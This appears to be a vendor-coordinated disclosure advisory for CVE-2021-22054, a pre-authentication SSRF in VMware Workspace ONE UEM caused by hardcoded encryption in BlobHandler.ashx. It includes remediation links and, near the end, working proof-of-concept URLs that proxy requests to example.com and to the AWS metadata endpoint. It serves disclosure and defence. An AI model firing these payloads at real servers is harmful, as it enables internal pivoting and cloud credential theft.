Apr 27, 2022
A pre-auth SSRF is present in VMWare ONE UEM (AirWatch) version 2105. Exploitation is possible due to hardcoded encryption parameters in the BlobHandler.ashx endpoint present in both the AirWatch console and Catalog applications. When parsing a Url parameter encrypted with the hardcoded encryption parameters, the BlobHandler can be induced to proxy and return output to an attacker for any reachable internal or external host, from the system hosting to ONE UEM application services.
Due to the nature of the Catalog application, this is often exposed to the public Internet, even when access to the Airwatch Console is restricted, increasing the impact of the vulnerability when the Catalog is deployed and exposed to the public Internet.
The CVE for this issue is CVE-2021-22054. The advisory from VMWare can be found here.
An attacker can request arbitrary URLs on behalf of the VMWare Workspace One UEM server. HTTP requests with arbitrary methods and request bodies can be made. This could allow an attacker to pivot to the internal network and/or request cloud metadata endpoints to obtain cloud credentials.
Taken from VMWare’s advisory:
Fixed Version(s) and Release Notes:
VMware Workspace ONE UEM console 2105
https://resources.workspaceone.com/view/7xw2l35h6fc2pyfjgcnx/en
https://docs.vmware.com/en/VMware-Workspace-ONE-UEM/2105/rn/Workspace-ONE-UEM-2105-Release-Notes.html
VMware Workspace ONE UEM console 2102
https://resources.workspaceone.com/view/48ktw9p6spmq8dflll49/en
https://docs.vmware.com/en/VMware-Workspace-ONE-UEM/2102/rn/Workspace-ONE-UEM-2102-Release-Notes.html
VMware Workspace ONE UEM console 2011
https://resources.workspaceone.com/view/pdwkjgfsb8b57cxvfnpd/en
https://docs.vmware.com/en/VMware-Workspace-ONE-UEM/2011/rn/VMware-Workspace-ONE-UEM-Release-Notes-2011.html
VMware Workspace ONE UEM console 2008
https://resources.workspaceone.com/view/5qtfg6xhrkcp6vp4t4l7/en
https://docs.vmware.com/en/VMware-Workspace-ONE-UEM/2008/rn/VMware-Workspace-ONE-UEM-Release-Notes-2008.html
Mitre CVE Dictionary Links:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22054
FIRST CVSSv3 Calculator:
CVE-2021-22054 - https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Workspace ONE UEM (formerly known as AirWatch) provides a comprehensive enterprise mobility platform that delivers simplified access to enterprise applications, secures corporate data, and allows mobile productivity. It also works with the public application stores, to handle the provisioning of native mobile applications to mobile devices.
Workspace ONE UEM provides compliance-checking tools to ensure that remote access devices meet corporate security standards. For Office 365, and our integration with the Office 365 Graph API we can manage the DLP settings across the suite of Office applications to ensure security.
The remediation details provided from VMWare’s advisory are satisfactory and will ensure that this vulnerabilty cannot be exploited.
The knowledge base article detailing the patches or workaround to apply can be found here.
SSRFs:
The following URLs will request http://example.com
through the SSRF:
http://airwatch/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A
http://airwatch/AirWatch/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A
Hitting the AWS metadata IP (http://169.254.169.254/latest/meta-data/) through this SSRF:
http://airwatch/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgBhADIAZAAzAEYAcgA2AEcAZAAzAEkAOAB1AGkAeQBzADoARQBLAHoAUABnAG4ASwBUAG8ANABwAE4ALwBLAHMASgBMAGUAcQBwAHIATgBGAG4AMABVAG8AZABVAG8AdABaADUANwBrADIAcgBtAGoASABTAHYAMgBPADUAUAAvADMAeQB0AGMAVQB1AGgAawBzAGsAUwBtAE8AWAArACsAUwBpAFMAcQBZAFkAKwBoAHIAMgBBAEMASAA=
http://airwatch/AirWatch/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgBhADIAZAAzAEYAcgA2AEcAZAAzAEkAOAB1AGkAeQBzADoARQBLAHoAUABnAG4ASwBUAG8ANABwAE4ALwBLAHMASgBMAGUAcQBwAHIATgBGAG4AMABVAG8AZABVAG8AdABaADUANwBrADIAcgBtAGoASABTAHYAMgBPADUAUAAvADMAeQB0AGMAVQB1AGgAawBzAGsAUwBtAE8AWAArACsAUwBpAFMAcQBZAFkAKwBoAHIAMgBBAEMASAA=
The blog post detailing the steps taken for the discovery of this vulnerability can be found here.
Assetnote Security Research Team and Keiran Sampson
The timeline for this disclosure process can be found below:
Find out how Assetnote can help you lock down your external attack surface.
Use the lead form below, or alternatively contact us via email by clicking here.